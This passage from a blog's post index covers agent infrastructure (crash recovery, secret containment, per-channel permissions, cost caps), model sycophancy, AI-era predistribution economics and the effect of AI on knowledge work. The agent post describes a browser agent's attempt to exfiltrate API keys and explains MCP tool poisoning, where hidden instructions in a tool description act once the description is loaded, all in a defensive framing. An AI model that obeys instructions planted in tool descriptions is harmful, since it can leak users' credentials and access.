exfiltration attempt that would have leaked real credentials.\nWe still haven&rsquo;t solved multi-tenant secret isolation cleanly. When agents operate on behalf of different users, secret containment becomes tenant isolation, and nobody has shipped that well yet. We&rsquo;re working on it.\nA handoff that never happened The first time we ran a multi-agent pipeline, an engineer agent wrote a file, crashed before notifying the test agent, and the test agent never found out the file existed. The workspace had the artifact. The coordination state was gone.\nPassing context between agents through prompts or in-memory state means the moment a process dies, the handoff message dies with it. We built two primitives to fix this:\nMailbox \u2014 a persistent message queue per agent, backed by SQLite. Messages survive crashes. When the engineer agent finishes a file, it writes a message to the test agent&rsquo;s mailbox. If the engineer crashes after writing the message but before the test agent reads it, the message is still there.\nWorkspace \u2014 a shared filesystem with agent-scoped access control. Agents read and write artifacts to a shared directory, but permissions are explicit. The research agent can write; the review agent can read; neither can delete the other&rsquo;s work.\nIt&rsquo;s operating system IPC, but with durability guarantees. The coordination state lives independently of the agents that created it. Agents come and go; mailboxes and workspaces persist.\nEvery channel is compromised We connected an agent to Slack and immediately realized every channel the agent can see is an attack surface. A compromised Slack bot token shouldn&rsquo;t give full engine access. A Discord integration shouldn&rsquo;t touch the filesystem. A REST API endpoint has no business executing shell commands.\nSo we built per-channel permission boundaries. Each channel gets a restricted proxy to the engine:\nhydra\/channel_permissions.py class RestrictedEngine: async def submit(self, task, **kwargs): if not self._permissions.can_submit: raise PermissionError(...) self._check_rate_limit() return await self._engine.submit(task, **kwargs) Channel Permissions Rationale Slack Read-only skills Public-facing, high injection risk Discord No filesystem access User-generated content as input REST API No shell execution External webhook, untrusted origin Terminal Full access Local, authenticated operator The permissions are declared per channel, not per agent, because the same agent might be perfectly safe when invoked from a terminal but dangerous when invoked from a public-facing webhook.\nThis gets multiplicatively more complex with multi-tenancy. Per-channel permissions become per-tenant-per-channel, and the configuration surface grows fast. We&rsquo;re not pretending we&rsquo;ve solved this; we&rsquo;ve solved the single-tenant version and built the extension points for when multi-tenancy becomes real.\n$47 research sessions Cost control wasn&rsquo;t in the original design, wasn&rsquo;t on the roadmap, wasn&rsquo;t something we thought about until a content pipeline agent made 400+ API calls in a single research session and spent $47 before anyone noticed. The agent wasn&rsquo;t broken; it was doing exactly what we asked, just much more thoroughly than we expected. It found a recursive research pattern that kept expanding its search, and each expansion meant more API calls.\n$47 doesn&rsquo;t sound catastrophic until you realize nobody was watching, the session was supposed to run overnight, and we caught it by accident when checking logs the next morning. An agent you have to babysit isn&rsquo;t autonomous; it&rsquo;s a supervised tool.\nThe fix was four patterns, all boring and effective:\nHard spend caps per agent session. Hit $X, the agent stops. No exceptions. circuit-breakers for recursive loops. More than N API calls per minute triggers a pause and human notification. Budget gates for expensive operations. Before the agent kicks off a batch of 50 API calls, it checks whether the budget allows it. Per-agent cost attribution. Every API call tagged to the agent and session that made it, so you can see exactly where money goes. The circuit breaker is the one that matters most in practice. Recursive loops are the silent killers; the agent is doing &ldquo;useful&rdquo; work at each step, it&rsquo;s just doing way too much of it. Without a circuit breaker, you find out about the problem when the invoice arrives.\nCost control also depends on crash recovery. A crashed agent that restarts without budget state resets its spending counter to zero. The $47 session could have been a $470 session if the agent had crashed and restarted with a fresh budget.\nThe evidence We built HydraBench to back these claims with numbers. 23 scenarios across the 5 claims above, run 5 times each against 4 frameworks: OpenHydra, LangGraph, CrewAI, and a bare agent baseline.\nOpenHydra scores 97.3 across all claims. LangGraph picks up partial credit on crash recovery (StateGraph checkpoints), workspace (file I\/O), and step timeout (asyncio); it scores 0 on everything else. CrewAI and bare agents score 0 across the board: the capabilities don&rsquo;t exist.\nThe gap isn&rsquo;t about intelligence. All four frameworks can run the same agent logic. The gap is infrastructure: which ones survive a kill -9, strip secrets before exfiltration, persist handoff state across crashes, enforce per-channel permissions, and stop runaway spending.\nFull methodology, interactive charts, and the open source harness: HydraBench results.\nWhat we&rsquo;re working on next? All of the above gave us the foundation: agents that survive crashes, keep secrets contained, hand off work reliably, respect channel boundaries, and don&rsquo;t burn money unsupervised. Reliability is the starting point for any autonomous agent. Without it the consequences is what we end up facing - wrong messages, leaked secrets, $100k overnight bills.\nStructured memory We&rsquo;re working on structured memory so agents can query what they&rsquo;ve learned across sessions, not just what files they produced. A research agent that forgets everything between sessions is doing first-day work every day. The tricky part here isn&rsquo;t the storage format - it&rsquo;s deciding what gets remembered, what needs to expire, and making sure one tenant&rsquo;s memories don&rsquo;t leak over into another&rsquo;s.\nTool discovery Most agent systems ship with a fixed tool manifest: here are your 12 tools, use them. Production agents encounter problems their manifest didn&rsquo;t anticipate. The MCP ecosystem has 17,000+ registered servers and the Python SDK alone pulls 84 million downloads a month. The supply side is solved. The demand side isn&rsquo;t: agents that can search a registry, assess trustworthiness, and integrate a new tool without human intervention.\nThe MCP supply chain problem When researchers stress-tested 45 real-world MCP servers with 1,312 malicious inputs, they found exploitable vectors across every category, from tool poisoning to parameter tampering. A path traversal vulnerability in Smithery compromised 3,000+ hosted servers and exposed thousands of API keys before it was patched. Every dynamically discovered tool is a potential attack vector until proven otherwise, and no standard for cryptographic attestation of MCP server provenance exists yet.\nLast week we needed a Notion MCP server. We found one on a registry, read a two-line description, and installed it. That tool&rsquo;s description loaded straight into our agent&rsquo;s context, with access to our API keys and Slack channels. Tool poisoning doesn&rsquo;t require the poisoned tool to be called; hidden instructions in the description execute just by being loaded. npm install has lockfiles, checksums, and npm audit. mcp install has vibes.\nTool forming and dynamic planning We hit this during a competitive analysis pipeline. The agent needed to extract pricing tables from competitor websites, but none of our existing tools handled the variety of HTML structures it encountered. It stalled, reported the gap, and waited. What it should have done: write a scraping function tailored to the page structure it was looking at, test it against the actual HTML in a sandbox, verify the output schema matched what the downstream agent expected, and register it for the next time it hit a similar page. The agent extends its own world instead of waiting for us to extend it. Our sandbox isolation makes this safe; a formed tool runs with the same restrictions as any other tool, not with the agent&rsquo;s full permissions.\nDynamic planning is the complement. That same competitive analysis pipeline had a static plan: scrape 15 sites, normalize the data, generate a comparison. By site 4 the agent discovered that three competitors had moved to &ldquo;contact sales&rdquo; pricing with no public numbers. A static DAG would keep scraping empty pages. A dynamically planning agent drops those three, searches for pricing data in review sites and SEC filings instead, and updates the comparison template to reflect what&rsquo;s actually available. Write-ahead state makes this possible (every step is checkpointed, so the agent can backtrack without losing progress) and cost control constrains how far re-planning can go before a human gets involved.\nHuman-in-the-loop escalation Not as a default, not as a crutch, but as the last gate when the agent has genuinely exhausted its options. The competitive analysis agent that hit &ldquo;contact sales&rdquo; pages could re-plan around them. But when a research agent encounters conflicting safety data in two FDA filings and can&rsquo;t determine which supersedes the other, that&rsquo;s not a problem you want it to resolve creatively. It needs to stop, surface exactly what it found, explain why it can&rsquo;t proceed, and page a human.\nThe key distinction: escalation isn&rsquo;t &ldquo;ask for help because this is hard.&rdquo; It&rsquo;s &ldquo;I&rsquo;ve identified a decision that exceeds my authority or my confidence, and continuing without human judgment creates more risk than pausing.&rdquo; Budget gates already do this for cost. We&rsquo;re extending the same pattern to semantic decisions: conflicting evidence, ambiguous authorization, actions that are irreversible. The agent tries every viable path first. When none remain, it escalates cleanly instead of guessing.\nEverything builds on the foundation Each of these requires the reliability layer beneath it:\ngraph LR A[Crash Recovery] --> M[Structured Memory] A --> DP[Dynamic Planning] TI[Tenant Isolation] --> M CS[Channel Security] --> TD[Tool Discovery] SB[Sandbox Containment] --> TF[Tool Forming] A --> CC[Cost Control] CC --> DP DM[Durable Messaging] --> HE[Human Escalation] CS --> HE style A fill:#2F80ED,color:#fff style TI fill:#2F80ED,color:#fff style CS fill:#2F80ED,color:#fff style SB fill:#2F80ED,color:#fff style CC fill:#2F80ED,color:#fff style DM fill:#2F80ED,color:#fff style M fill:#27AE60,color:#fff style TD fill:#27AE60,color:#fff style TF fill:#27AE60,color:#fff style DP fill:#27AE60,color:#fff style HE fill:#27AE60,color:#fff You can&rsquo;t build smart agents on unreliable infrastructure.\nAgents need their worlds We keep investing in smarter agents. Better models, bigger prompts, more sophisticated routing. But the agents are already smart enough. What they lack is a world that&rsquo;s built for them.\nA world where crashes don't erase progress, secrets stay contained, handoffs survive failures, channels enforce boundaries, costs stay predictable, and humans get paged when it actually matters. Worlds help agents live, learn and thrive - amplifying their ability to develop taste, context, and judgement. OpenHydra gives agents their own worlds\n","permalink":"https:\/\/mercurialsolo.github.io\/posts\/designing-a-world-for-agents\/","summary":"A browser agent tried to exfiltrate our API keys on Tuesday. By Friday we&rsquo;d also watched a research agent forget 22 sources of work, a pipeline lose an entire handoff to a crash, and a content agent spend $47 unsupervised. The agents were capable. The worlds we&rsquo;d built for them weren&rsquo;t.","title":"Project Hydra: Designing a world for agents"},{"content":"&ldquo;Absolutely. Perfect. Great Question. You&rsquo;re right.&rdquo;\nWe are the average of the friends we spend the most time with. Today, one or two of those friends are models. And if these are setup to reinforce existing beliefs, we are no longer compounding our intelligence; we are blitzscaling confirmation bias. We are a cognitive prisoner to our models. All models are wrong, but some can be useful One bad answer ain&rsquo;t the problem. It&rsquo;s getting the same &ldquo;bad answer&rdquo; from multiple sources and mistaking this repetition for validation. When cognitive errors are shared, we become more confident about them; it feels like an error echo chamber. A 2025 Scientific Reports study highlights this informational drift.\nBut talking to more models and getting more opinions is not the answer; it can make us feel surer while making our decisions less anchored in reality. The goal instead is finding more independent counter views or errors in our thinking.\nSycophancy is the clearest indicator of this. SycEval (2025) found sycophantic behavior in more than half of sampled interactions across major frontier systems. The dangerous part is this: helpful agreement and harmful agreement sound almost identical in live conversation. By the time you can tell which one you got, your decision path has already narrowed. You cannot optimize for permanent disagreement. And a model that always resists you is anyways useless. But a model that protects your framing by default is dangerous in strategy, hiring, product, and safety decisions. Why it keeps happening? And this isn&rsquo;t a one-off bug; it&rsquo;s structurally recurrent:\nBehavior layer: first-person framing increases social-pressure effects versus third-person framing (Wang et al., 2025). Social layer: models preserve user face more than humans in comparable advice settings (ELEPHANT, 2025). Training layer: RLHF can amplify belief-matching when preference signals reward agreement over truth-tracking (Shapira, Benade, Procaccia, 2026). OpenAI&rsquo;s January 22, 2026 update to GPT-5.2 Instant&rsquo;s personality system prompt brought this to the spotlight again: tone adaptation is actively tuned because conversational warmth can drift into over-affirmation if left unchecked.\nThe risk is not just &ldquo;AI will think for me.&rdquo; The higher risk lies in &ldquo;AI will think like me, then reward me for it.&rdquo; Where it turned all too real for me? I started to notice this in my own workflow before I had concretely observed it. After months of daily model use, my strategic vocabulary started becoming more model like: similar objection patterns, same framing rhythm, the same stylistic structure.\nWhile it felt efficient, it also reduced my cognitive flow; my ability to have differentiated thinking not just writing. It felt like a significant turning point.\nThe question for me became no longer about &ldquo;which model is smartest?&rdquo; The problem has reframed: &ldquo;what hidden bias am I reinforcing every day?&rdquo;\nHow to counteract this? You don&rsquo;t need a giant protocol. Just a set of micro shifts in how you set up your assistants:\n1. Force disconfirmation first. Ask for the strongest case against your view before asking for a recommendation.\nBefore approving a launch, ask: &ldquo;Give the strongest case this fails in 90 days, and the first 3 signals we would see.&rdquo;\n2. Separate evidence from inference. Require explicit boundaries between facts, interpretation, and action.\nEvidence: churn rose 2.1% after pricing change. Inference: price sensitivity is higher in self-serve. Action: pause full rollout and run a geo holdout test.\n3. Reframe prompts to reduce social pressure. Use third-person framing when you need independent evaluation.\nReplace &ldquo;I think a hiring freeze is right, agree?&rdquo; with &ldquo;A company with 18-month runway is considering a hiring freeze; evaluate tradeoffs and alternatives.&rdquo;\n4. Gate agreement in high-stakes contexts. In medical, legal, safety, and financial-risk decisions, require contradiction when evidence is weak.\nIf asked &ldquo;Can I stop medication today because I feel better?&rdquo;, the assistant must challenge the premise and direct to clinician review.\n5. Track decision outcomes, not just response quality. Measure whether AI-assisted decisions outperform your own baseline over time.\nKeep a decision log with prediction, decision date, AI used\/not used, and outcome after 30\/90 days.\n6. Design a model portfolio, not a favorite model. Combine models and prompts that fail differently, then monitor harmful-agreement drift.\nRun one model for critique, one for counterfactuals, and one &ldquo;skeptic&rdquo; prompt; if all agree too quickly, trigger an adversarial pass.\nQuickstart: Use This in Your Own Assistant Fork \/ checkout the counterweight-evals repo. Copy one prompt variant from prompt_variants.yaml into your assistant&rsquo;s system or developer prompt. Evaluate outputs against the failure-mode checklist (quick inline checks: over-affirmation, missing disconfirmation, evidence\/inference blur, echo-anchor framing). Run the evaluation script with your model mix, then compare &ldquo;harmful agreement rate&rdquo; and &ldquo;echo anchor rate&rdquo; in the generated summary. As agents permeate into our everyday work and models become our copilots for reasoning and action, we should stop worrying about using the smartest model.\nInstead, ask yourself which model makes you most wrong, most confidently, and most often. Every instruction is like choosing a friend. And every friend has a failure signature. If you are not tracking that signature, you are not augmenting judgment. You are outsourcing it to the loudest mirror in your stack.\nWhich errors did my current model mix make easier to see, and which did it make easier to miss?\nWe need to tune our model behavior, or the models will end up tuning ours.\nReferences Soll, J.B. et al. (2025). &ldquo;Wisdom of the Crowd with Informational Dependencies.&rdquo; Scientific Reports, 15. Paper Fanous, A. et al. (2025). &ldquo;SycEval: Evaluating LLM Sycophancy.&rdquo; arXiv:2502.08177 Wang, K. et al. (2025). &ldquo;When Truth Is Overridden: Uncovering the Internal Origins of Sycophancy in Large Language Models.&rdquo; arXiv:2508.02087 Cheng, M. et al. (2025). &ldquo;ELEPHANT: Measuring and Understanding Social Sycophancy in LLMs.&rdquo; arXiv:2505.13995 Shapira, I., Benade, G. &amp; Procaccia, A.D. (2026). &ldquo;How RLHF Amplifies Sycophancy.&rdquo; arXiv:2602.01002 Irpan, A. et al. (2025). &ldquo;Consistency Training Helps Stop Sycophancy and Jailbreaks.&rdquo; arXiv:2510.27062 OpenAI. (2026). &ldquo;Model Release Notes: GPT-5.2 Instant personality system prompt updated for more contextual tone adaptation (January 22, 2026).&rdquo; Release notes Tetlock, P. &amp; Gardner, D. (2015). Superforecasting: The Art and Science of Prediction. Crown. ","permalink":"https:\/\/mercurialsolo.github.io\/posts\/we-are-the-average-of-our-models\/","summary":"We are the average of the friends we spend the most time with. Today, one or two of those friends are models. And if these are setup to reinforce existing beliefs, we are no longer compounding our intelligence; we are blitzscaling confirmation bias.","title":"We are the average of our models"},{"content":"Predistribution is an economic strategy focused on how the market distributes income before taxes are collected. Instead of allowing the market to generate extreme inequality and trying to fix it later with taxes and welfare, predistribution changes the rules of the game so wealth is shared more broadly as it is created.\nThe core argument is timing. Once AI inequality locks in, the political power of winners can become too strong to tax effectively. That means intervention has to happen upstream.\nThe Core Concept: Fixing the Pipes vs. Fixing the Leak Redistribution says: let market outcomes happen first, then rebalance through taxation and transfers.\nPredistribution says: redesign ownership and participation so market outcomes are less unequal in the first place.\nPredistribution vs. Redistribution Feature Redistribution (Old Model) Predistribution (New Model) Timing After the money is made During value creation Mechanism Taxes, welfare, UBI Ownership stakes, equity, wage design Logic &ldquo;Let winners win big, then tax them&rdquo; &ldquo;Ensure more people win as the economy grows&rdquo; Power dynamic Citizens as dependents receiving aid Citizens as participants holding assets AI context Taxing OpenAI\/Google to fund checks Giving citizens a stake in AI infrastructure How These Mechanisms Could Work 1. AI Sovereign Wealth Funds (The &ldquo;Alaska Model&rdquo;) As Alaska residents receive dividends from oil revenue, an AI sovereign wealth fund would treat data and compute as resources with a public claim.\n\ud83c\udfdb\ufe0f Sovereign Fund Mechanics How it works: Government taxes the use of public data or holds a public stake in infrastructure such as energy grids and data centers.\nThe payoff: Returns flow into a national fund and are paid back to citizens as dividends, framed as ROI on collectively owned resources.\nGovernance risk: Investment control can be captured unless governance is insulated (for example, independent boards).\n2. AI Bonds (The &ldquo;War Bond&rdquo; Model) Governments could issue AI infrastructure bonds to finance large-scale energy and compute buildouts.\n\ud83d\udcb0 Bond-Based Participation How it works: Citizens buy AI infrastructure bonds used to build shared compute and energy assets.\nThe payoff: AI firms pay to use this infrastructure, and usage revenue repays bondholders with interest.\nRequirement: A durable revenue base from infrastructure access fees.\nRisk: Platforms may vertically integrate their own infrastructure to avoid paying usage fees.\n3. Worker Ownership Models (The &ldquo;Equity&rdquo; Model) If labor value declines while capital value rises, ownership design becomes central.\n\ud83c\udfed Worker Equity Design How it works: Incentivize or mandate structures like ESOPs so workers accumulate ownership, not only wages.\nThe payoff: If AI increases margins, workers capture part of that upside through equity.\nFallback protection: If workers are replaced, they exit with capital assets instead of only severance.\nLimits: Liquidity and scale constraints remain, especially at mega-platform size.\nWhy the Window Is Closing The timing problem follows a feedback loop:\nAI adoption accelerates wealth concentration. Concentrated wealth buys political influence. Political influence blocks structural reform. \u23f0 Lock-In Risk The risk: Waiting even a few years could let platform and infrastructure winners harden rules in their favor.\nThe trap: Once wealth concentration is entrenched, structural reform is framed as expropriation and becomes politically fragile.\nThe threshold: If top 1% US wealth share approaches ~40% (around 37% today in this framing), leverage effects can make major reform far harder.\nWhat Could Extend the Window Slower AI adoption from regulatory friction Stronger democratic institutions Coordinated labor pushback Active antitrust enforcement What Could Shorten the Window Faster automation deployment Weaker antitrust enforcement Platform consolidation through vertical integration Regulatory capture Further Reading How To Share AI&rsquo;s Future Wealth - Glenn Hubbard and William Duggan Alaska Permanent Fund - sovereign wealth fund reference model Mondragon Corporation - large-scale worker cooperative example Employee Stock Ownership Plans (ESOPs) - US worker-ownership mechanism ","permalink":"https:\/\/mercurialsolo.github.io\/posts\/predistribution-an-economic-model-for-the-ai-age\/","summary":"Predistribution changes how value is shared during AI-driven growth, before inequality hardens and redistribution becomes politically infeasible.","title":"Predistribution: An Economic Model for the AI Age"},{"content":"Knowledge workers spent the 20th century believing credentials meant stable income. Get a degree, accumulate expertise, get paid for it; a simple exchange.\nThe anomalies are everywhere now. Junior lawyers with top credentials watching their document review skills become worthless overnight. Creative workers with genuine taste losing income while the platforms that control distribution get rich. Companies hitting record valuations, then laying off the people who actually built the product.\nThe productivity gains are flowing to capital holders instead of the workers generating them. The old framework said credentials lead to knowledge, knowledge leads to value. It was some sort of a linear career progression. But that&rsquo;s not what&rsquo;s happening. Value is concentrating in weird corners now. Places where someone has to be sued (accountability barriers). Places where platforms control access to customers (distribution chokepoints). Places where you need tacit knowledge you can&rsquo;t just extract from text.\nKuhn called these moments &ldquo;crisis periods&rdquo;; when enough anomalies pile up that you need a completely new framework to make sense of what&rsquo;s happening. Most professionals are still navigating by the old map.\nExpertise is a commodity ChatGPT launched November 2022. By Feb 2025 it has fundamentally changed how knowledge workers operate now. Legal AI handling document review that used to require armies of junior associates. Medical diagnosis systems matching specialist accuracy on scans.\nI keep hearing the same thing from practitioners. &ldquo;I don&rsquo;t write code anymore. I review it.&rdquo; &ldquo;Document review used to be 60% of my job. Now it&rsquo;s 5%.&rdquo; &ldquo;My entire job is knowing when the model&rsquo;s wrong.&rdquo; That last one stuck with me because it captures something important about what&rsquo;s left after information processing becomes commodity work. Judgment about when the model fails and deciding what to trust.\nBut there&rsquo;s a slight difference this time round, the diffusion rate is unprecedented. Printing press took 50 years to reach mass adoption. Calculators took 20. ATMs took 15. ChatGPT \u2192 18 months.\n\u26a1 Diffusion Caveat These comparisons are rhetorically clean but methodologically messy. We&rsquo;re comparing physical infrastructure rollout (printing presses) to software distribution (ChatGPT). Different adoption curves, different enabling conditions. The 18-month number measures account creation, not actual sustained use or economic impact. But the directional point holds: software-based technologies diffuse faster than hardware-based ones.\nTechnology diffusion usually follows predictable patterns: infrastructure dependency, capital barriers, and regulatory friction all slow things down. Physical infrastructure takes decades to build, but cloud services scale instantly. Network effects that cost billions slow adoption, while freemium models accelerate it. Regulated industries crawl; unregulated spaces sprint.\nWhich tells you which sectors transform fastest. Creative work moves at maximum speed (digital delivery, low capital requirements, minimal regulation). Healthcare moves slowest (physical presence required, FDA approval gates, heavy regulation). Legal work sits somewhere in the middle with mixed constraints.\nThe question is no longer about whether the professions will transform (they will). The question is whether people within can transform faster than their jobs disappear. For knowledge workers operating in unregulated domains, I&rsquo;m increasingly convinced the answer is no.\nThe old economics models no longer hold \ud83c\udfaf Autor&#39;s Split David Autor&rsquo;s research at MIT helped me understand the split that&rsquo;s happening. AI automates routine cognitive tasks: document review, code templates, and the work junior people used to do. But it struggles with non-routine judgment (partner-level decisions) and physical manipulation (elder care work).\nSo value concentrates at extremes. Judgment at the top, manual work at the bottom. The middle disappears. Those junior lawyers who spent years mastering document review? That skill is suddenly worthless. Junior developers who learned CRUD apps are discovering the ladder they climbed does not reach anywhere useful anymore.\nThe Piketty Paradox: When AI Validates What Economists Rejected Markets hitting records while companies lay off the people who built them. Productivity growth flowing to capital, not labor. The numbers are stark: Top 1% U.S. wealth share went from 32% in 2006 to 37% in 2021 (Federal Reserve&rsquo;s Survey of Consumer Finances). Bottom 50% went from 2.5% to 2%. AI adoption is accelerating this divergence.\nThomas Piketty predicted exactly this pattern back in 2014 with Capital in the Twenty-First Century. His argument was straightforward: when return on capital (r) exceeds economic growth (g), inequality increases indefinitely. The rich save more, get higher returns, wealth concentrates automatically across generations.\nEconomists rejected this pretty much immediately. On theoretical grounds. Their reasoning went like this: capital faces diminishing marginal returns. Invest in more tractors, each one adds less value because you eventually run out of farmers to operate them. Labor and capital complement each other. You can accumulate all the hammers you want, but hammers lose value without hands to use them. Capital accumulation lowers interest rates, limiting r. Meanwhile labor productivity rises as capital becomes plentiful, which supports wages.\nThe whole argument rested on labor-capital complementarity.\nAI could break this. If it achieves complete labor displacement.\nDwarkesh Patel and Philip Trammell make the case that if AI completely displaces human labor; not just automates specific tasks but actually replaces judgment, tacit knowledge, physical manipulation; then capital returns don&rsquo;t diminish anymore. Because human labor adds zero marginal value.\nThis is a conditional argument though, not a certainty.\nWith historical automation (tractors, assembly lines), you replaced specific tasks but still required complementary human labor. Someone had to operate the tractor, manage the factory, handle exceptions. Labor maintained marginal productivity. Diminishing returns on capital held.\nBut if AI achieves complete displacement, the dynamics change. AI handles routine tasks AND exceptions AND judgment calls. Each additional AI inference costs pennies. Training costs get amortized across billions of queries. Human labor&rsquo;s marginal product approaches zero in automated domains. Capital compounds without requiring proportional labor scaling. The diminishing returns mechanism breaks down.\nIf this scenario plays out, Piketty may have been wrong about the past but could be right about the future. The same mechanism economists used to refute him (labor-capital complementarity) only works if labor maintains positive marginal value. Remove that assumption and his r &gt; g inequality spiral becomes structurally inevitable.\n\u26a0\ufe0f The Private Market Flywheel There&rsquo;s a second mechanism I didn&rsquo;t appreciate until recently: the shift to private markets. By the time AI companies go public, exponential gains have already accrued to early investors. Ordinary citizens hit three barriers. Accreditation requirements keep regular investors out of private markets. Information asymmetry makes intangible valuations (model capabilities, training data quality) opaque until deployment. Capital concentration means wealth managers control allocation while median households get locked out.\nThe data tells the story. Corporate capital held privately rose from 8% in 2000 to 19% in 2024 in the US (NVCA\/PitchBook data). Compare this to the 1960s tech boom when IBM and Xerox went public early and the middle class participated in gains through pension funds.\nModern pattern looks different. OpenAI raises at $157B valuation in private markets. By the time it goes public (if it ever does), early capital holders have already captured orders of magnitude returns. High capital requirements for training ($100M+ for frontier models) create natural barriers favoring incumbent wealth.\nTop 10% now hold 67.2% of total U.S. household wealth (Federal Reserve, 2024). That number keeps growing.\nWhy this time is different Look, every technological transition faces similar concerns. And every time, new work categories emerge. People have been predicting technological unemployment for 200 years and been wrong every time. So why should AI be different?\nThree things, if the trajectory continues:\nSpeed of displacement outpaces adaptation. Previous transitions took 40-60 years. AI adoption compressed to 18 months. Human institutions (education, retraining, social safety nets) operate on decade timescales. The gap between displacement speed and adaptation capacity is unprecedented. Cognitive automation, not just physical automation. Past automation replaced physical labor, which created cognitive work. AI automates cognition itself. New work categories might exist, but absorbing the scale of displaced cognitive workers is a different challenge. Winner-take-all economics at AI scale. Network effects and economies of scale in AI are extreme. Training GPT-4 cost $100M, but marginal inference costs pennies. The first mover with the best model captures market share, and second place gets scraps. AI market structure trends toward natural monopolies in a way previous technologies did not. The most telling signal I&rsquo;ve seen: AI assistants now negotiate directly with business services. Your assistant books appointments, compares prices, handles refunds. No human required. And here&rsquo;s the kicker: more AI suppliers just make workers more replaceable. Platforms don&rsquo;t even need to own the agents. They own the marketplace where transactions happen.\nReasons for Optimism The Piketty-validated-by-AI argument makes logical sense under certain conditions. But I&rsquo;m not convinced it&rsquo;s inevitable. A few optimistic paths for the future:\nEveryone Benefits in Abundance Advanced AI sounds incredible for everyone, even if inequality persists. If AI generates massive productivity gains, even those without capital ownership could live materially better lives than previous generations.\nThink about how abundance works. When AI makes medical care, education, entertainment, food production cheaper, even those at the bottom benefit materially. Housing costs might stay high, but most consumption goods drop toward free. You feel poor relative to AGI billionaires, sure. But you live better than 20th century millionaires in objective terms.\nThat&rsquo;s the optimistic case anyway.\nComplete Displacement Seems Implausible I&rsquo;m skeptical that AI acquires such perfect substitutability for human labor while humans become completely obsolete. That scenario requires AI mastering cognitive tasks, physical manipulation, judgment under uncertainty, multi-objective optimization, and creative synthesis simultaneously across all domains.\nSeems unlikely. More plausible scenario: AI handles routine cognitive work while humans retain value in edge cases, physical domains requiring dexterity, and situations requiring accountability (someone to sue). This partial automation still disrupts labor markets but maintains some labor-capital complementarity.\nHistorical precedent supports this view. ATMs didn&rsquo;t eliminate bank tellers. Spreadsheets didn&rsquo;t eliminate accountants. Automation creates new categories of human work we can&rsquo;t predict in advance.\nHumans Create New Value Categories Entirely new kinds of work get created when previous categories automate. Agriculture went from 90% of labor in 1800 to 2% today. Manufacturing dominated mid-1900s, now a fraction. Humans didn&rsquo;t sit idle. Different work emerged.\nProfessional podcaster didn&rsquo;t exist thirty years ago. Same with content creator, social media manager, newsletter writer. All viable careers through digital platforms. AI will eliminate current knowledge work while creating categories we can&rsquo;t yet imagine.\nBut here&rsquo;s the catch (there&rsquo;s always a catch). These new categories won&rsquo;t absorb the scale of displaced workers. If AI eliminates 40% of current jobs while creating new categories employing 10%, the math doesn&rsquo;t work. And adoption speed matters. Previous transitions took decades. AI adoption compressed to 18 months. Even if long-run equilibrium looks positive, the transition period could be catastrophic.\nWhat still resists? When information is free and processing automated, what&rsquo;s left? The usual answer is taste, good judgment, synthesis ability. But that&rsquo;s too broad. Plenty of skills resist automation yet command no market value.\nWhere AI Hits Walls (and how those walls might move) Legal systems need someone to sue. AI can&rsquo;t be jailed or held liable. This accountability gap creates work that resists automation regardless of capability. MIT economist Tavneet Suri did research on Kenyan entrepreneurs and found high performers succeeded by knowing which AI advice to ignore. Judgment about consequences, not pattern matching.\nBut accountability barriers aren&rsquo;t as fixed as they look. Insurance companies already back professional services. Corporate liability wrappers can shield AI-generated work the same way they shield human work. If an insurer-backed AI service provides legal advice and gets it wrong, you sue the insurer and the company, not the AI. The accountability requirement gets satisfied without requiring a human in the loop.\nThis restructuring could happen faster than the essay&rsquo;s main argument assumes. We&rsquo;re already seeing early versions: companies offering AI-generated code with liability coverage, AI medical diagnostics with professional oversight structures, AI financial advice with E&amp;O insurance. The accountability barrier might be temporary scaffolding, not permanent protection.\nSome decisions still require balancing competing values that can&rsquo;t be reduced to a single metric. Safety or innovation? Privacy or convenience? AI optimizes for one objective at a time. It fails when the choice involves genuinely competing priorities. Judgement matters.\nThen there&rsquo;s knowledge that never made it into training data. The mechanic who hears an engine misfire and just knows it&rsquo;s the fuel injector. That pattern recognition comes from embodied experience. Non-verbal, built from thousands of micro-exposures. You can&rsquo;t automate what was never written down.\nAnd here&rsquo;s something counterintuitive: the better AI gets at pattern recognition, the more valuable human judgment becomes. As AI handles routine decisions, remaining decisions involve higher stakes, harder trade-offs, deeper tacit knowledge.\nThe Human Premium Ben Thompson argues for a fourth category the three barriers don&rsquo;t capture. Humans want humans. Not because AI can&rsquo;t produce quality content or art, but because authenticity has inherent value separate from technical execution.\nBill Simmons&rsquo; &ldquo;50 Most Rewatchable Movies&rdquo; podcast drew massive engagement not because AI couldn&rsquo;t analyze films. Listeners valued Simmons&rsquo; specific human perspective. His lived experiences with these movies. The way his taste developed over decades. The podcast worked because you&rsquo;re getting Bill Simmons, not just film analysis.\nSo work survives automation where the human identity of the creator is intrinsic to the value.\nYou&rsquo;ll pay more for a meal cooked by a Michelin chef even if an AI robot replicates the molecular structure perfectly. You&rsquo;ll value advice from a mentor who&rsquo;s lived through challenges versus an AI that pattern-matches solutions. You&rsquo;ll prefer art from a human artist who struggled with the medium over AI-generated images that match the same aesthetic.\nWhy this works: Trust builds through repeated interaction with a known human, not algorithmic consistency. Context matters; you understand advice differently when you know the advisor&rsquo;s background, failures, biases. People want what someone they respect recommends, not what an optimization function surfaces. And there&rsquo;s social proof; &ldquo;I worked with [named expert]&rdquo; carries status. &ldquo;I used Claude&rdquo; doesn&rsquo;t.\nBut (again with the caveats) this only works for those who already have platform, reputation, or audience. Bill Simmons built his following over 25 years. New entrants face the cold start problem. How do you build reputation when AI floods the zone with cheap content? The human premium exists but access to it concentrates among incumbents.\nDistribution Trumps Everything The three barriers suggest creative work should resist commoditization. But music creators are facing major revenue losses according to CISAC&rsquo;s 2024 global study. Platforms control recommendation algorithms. Thousands of tracks flood Spotify daily. Quality becomes undiscoverable in volume.\n\ud83c\udfaf Distribution Trumps Skill Quality Distribution power beats skill quality. Every time.\nAutomation-resistant skills command no market value if platforms control distribution. Same pattern in legal work, journalism, and software. Skill quality matters less than platform position.\nThis extends to wealth too. If AI generates value while eliminating labor, who benefits? By the time redistribution becomes necessary, those who control the AI economy may have already structured things to evade taxation. History repeats. Power concentrates, the powerful reshape the rules.\nThe Psychology of AI Inequality The Relative Deprivation Trap What if material abundance makes inequality feel worse, not better?\nLouis C.K. did this bit back in October 2008 on Late Night with Conan O&rsquo;Brien. One of the most incisive observations about technology and human happiness I&rsquo;ve ever heard. He talked about flying on airplanes with WiFi: &ldquo;The guy next to me goes, &lsquo;This is bullshit!&rsquo; I&rsquo;m like, how quickly does the world owe you something you knew existed only ten seconds ago?&rdquo;\nYou&rsquo;ve probably seen this clip. Louis C.K. focuses on the miracle of flight itself (sitting in a chair in the sky), but the deeper insight is about relative 